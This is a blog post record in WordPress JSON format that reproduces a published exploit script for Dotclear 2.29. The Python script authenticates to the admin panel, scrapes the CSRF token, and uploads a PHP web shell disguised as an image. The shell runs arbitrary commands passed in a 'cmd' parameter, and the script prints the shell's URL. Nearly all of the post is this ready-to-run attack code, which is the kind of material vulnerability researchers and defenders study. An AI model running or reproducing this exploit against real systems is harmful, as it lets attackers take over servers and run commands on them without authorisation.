{"id":57232,"date":"2024-06-03T18:49:46","date_gmt":"2024-06-03T15:49:46","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/178892\/dotclear229-exec.txt"},"modified":"2024-06-03T18:49:46","modified_gmt":"2024-06-03T15:49:46","slug":"dotclear-2-29-remote-code-execution","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/dotclear-2-29-remote-code-execution\/","title":{"rendered":"Dotclear 2.29 Remote Code Execution"},"content":{"rendered":"<p># Exploit Title: Dotclear 2.29 &#8211; Remote Code Execution (RCE)<br \/># Discovered by: Ahmet \u00dcmit BAYRAM<br \/># Discovered Date: 26.04.2024<br \/># Vendor Homepage: https:\/\/git.dotclear.org\/explore\/repos<br \/># Software Link:<br \/>https:\/\/github.com\/dotclear\/dotclear\/archive\/refs\/heads\/master.zip<br \/># Tested Version: v2.29 (latest)<br \/># Tested on: MacOS<\/p>\n<p>import requests<br \/>import time<br \/>import random<br \/>import string<br \/>from bs4 import BeautifulSoup<\/p>\n<p>def generate_filename(extension=&#8221;.inc&#8221;):<br \/>return &#8221;.join(random.choices(string.ascii_letters + string.digits, k=5)) +<br \/>extension<\/p>\n<p>def get_csrf_token(response_text):<br \/>soup = BeautifulSoup(response_text, &#8216;html.parser&#8217;)<br \/>token = soup.find(&#8216;input&#8217;, {&#8216;name&#8217;: &#8216;xd_check&#8217;})<br \/>return token[&#8216;value&#8217;] if token else None<\/p>\n<p>def login(base_url, username, password):<br \/>print(&#8220;Exploiting&#8230;&#8221;)<br \/>time.sleep(1)<br \/>print(&#8220;Logging in&#8230;&#8221;)<br \/>time.sleep(1)<br \/>session = requests.Session()<br \/>login_data = {<br \/>&#8220;user_id&#8221;: username,<br \/>&#8220;user_pwd&#8221;: password<br \/>}<br \/>login_url = f&#8221;{base_url}\/admin\/index.php?process=Auth&#8221;<br \/>login_response = session.post(login_url, data=login_data)<br \/>if &#8220;Logout&#8221; in login_response.text:<br \/>print(&#8220;Login Successful!&#8221;)<br \/>return session<br \/>else:<br \/>print(&#8220;Login Failed!&#8221;)<br \/>return None<\/p>\n<p>def upload_file(session, base_url, filename):<br \/>print(&#8220;Shell Preparing&#8230;&#8221;)<br \/>time.sleep(1)<br \/>boundary = &#8220;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;376201441124932790524235275389&#8221;<br \/>headers = {<br \/>&#8220;Content-Type&#8221;: f&#8221;multipart\/form-data; boundary={boundary}&#8221;,<br \/>&#8220;X-Requested-With&#8221;: &#8220;XMLHttpRequest&#8221;<br \/>}<br \/>csrf_token = get_csrf_token(session.get(f&#8221;{base_url}<br \/>\/admin\/index.php?process=Media&#8221;).text)<br \/>payload = (<br \/>f&#8221;&#8211;{boundary}\\r\\n&#8221;<br \/>f&#8221;Content-Disposition: form-data; name=\\&#8221;MAX_FILE_SIZE\\&#8221;\\r\\n\\r\\n&#8221;<br \/>f&#8221;2097152\\r\\n&#8221;<br \/>f&#8221;&#8211;{boundary}\\r\\n&#8221;<br \/>f&#8221;Content-Disposition: form-data; name=\\&#8221;xd_check\\&#8221;\\r\\n\\r\\n&#8221;<br \/>f&#8221;{csrf_token}\\r\\n&#8221;<br \/>f&#8221;&#8211;{boundary}\\r\\n&#8221;<br \/>f&#8221;Content-Disposition: form-data; name=\\&#8221;upfile[]\\&#8221;; filename=\\&#8221;{filename}<br \/>\\&#8221;\\r\\n&#8221;<br \/>f&#8221;Content-Type: image\/jpeg\\r\\n\\r\\n&#8221;<br \/>&#8220;&lt;html&gt;\\n&lt;body&gt;\\n&lt;form method=\\&#8221;GET\\&#8221; name=\\&#8221;&lt;?php echo<br \/>basename($_SERVER[&#8216;PHP_SELF&#8217;]); ?&gt;\\&#8221;&gt;\\n&#8221;<br \/>&#8220;&lt;input type=\\&#8221;TEXT\\&#8221; name=\\&#8221;cmd\\&#8221; autofocus id=\\&#8221;cmd\\&#8221; size=\\&#8221;80\\&#8221;&gt;\\n&lt;input<br \/>type=\\&#8221;SUBMIT\\&#8221; value=\\&#8221;Execute\\&#8221;&gt;\\n&#8221;<br \/>&#8220;&lt;\/form&gt;\\n&lt;pre&gt;\\n&lt;?php\\nif(isset($_GET[&#8216;cmd&#8217;]))\\n{\\nsystem($_GET[&#8216;cmd&#8217;]);\\n}<br \/>\\n?&gt;\\n&lt;\/pre&gt;\\n&lt;\/body&gt;\\n&lt;\/html&gt;\\r\\n&#8221;<br \/>f&#8221;&#8211;{boundary}&#8211;\\r\\n&#8221;<br \/>)<br \/>upload_response = session.post(f&#8221;{base_url}<br \/>\/admin\/index.php?process=Media&amp;sortby=name&amp;order=asc&amp;nb=30&amp;page=1&amp;q=&amp;file_mode=grid&amp;file_type=&amp;plugin_id=&amp;popup=0&amp;select=0&#8243;,<br \/>headers=headers, data=payload.encode(&#8216;utf-8&#8217;))<\/p>\n<p>if upload_response.status_code == 200:<br \/>print(f&#8221;Your Shell is Ready: {base_url}\/public\/{filename}&#8221;)<br \/>else:<br \/>print(&#8220;Exploit Failed!&#8221;)<\/p>\n<p>def main(base_url, username, password):<br \/>filename = generate_filename()<br \/>session = login(base_url, username, password)<br \/>if session:<br \/>upload_file(session, base_url, filename)<\/p>\n<p>if __name__ == &#8220;__main__&#8221;:<br \/>import sys<br \/>if len(sys.argv) != 4:<br \/>print(&#8220;Usage: python script.py &lt;siteurl&gt; &lt;username&gt; &lt;password&gt;&#8221;)<br \/>else:<br \/>base_url = sys.argv[1]username = sys.argv[2]password = sys.argv[3]main(base_url, username, password)<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Dotclear 2.29 &#8211; Remote Code Execution (RCE)# Discovered by: Ahmet \u00dcmit BAYRAM# Discovered Date: 26.04.2024# Vendor Homepage: https:\/\/git.dotclear.org\/explore\/repos# Software Link:https:\/\/github.com\/dotclear\/dotclear\/archive\/refs\/heads\/master.zip# Tested Version: v2.29 (latest)# Tested on: MacOS import requestsimport timeimport randomimport stringfrom bs4 import BeautifulSoup def generate_filename(extension=&#8221;.inc&#8221;):return &#8221;.join(random.choices(string.ascii_letters + string.digits, k=5)) +extension def get_csrf_token(response_text):soup = BeautifulSoup(response_text, &#8216;html.parser&#8217;)token = soup.find(&#8216;input&#8217;, {&#8216;name&#8217;: &#8216;xd_check&#8217;})return token[&#8216;value&#8217;] &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-57232","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57232","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=57232"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57232\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=57232"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=57232"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=57232"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}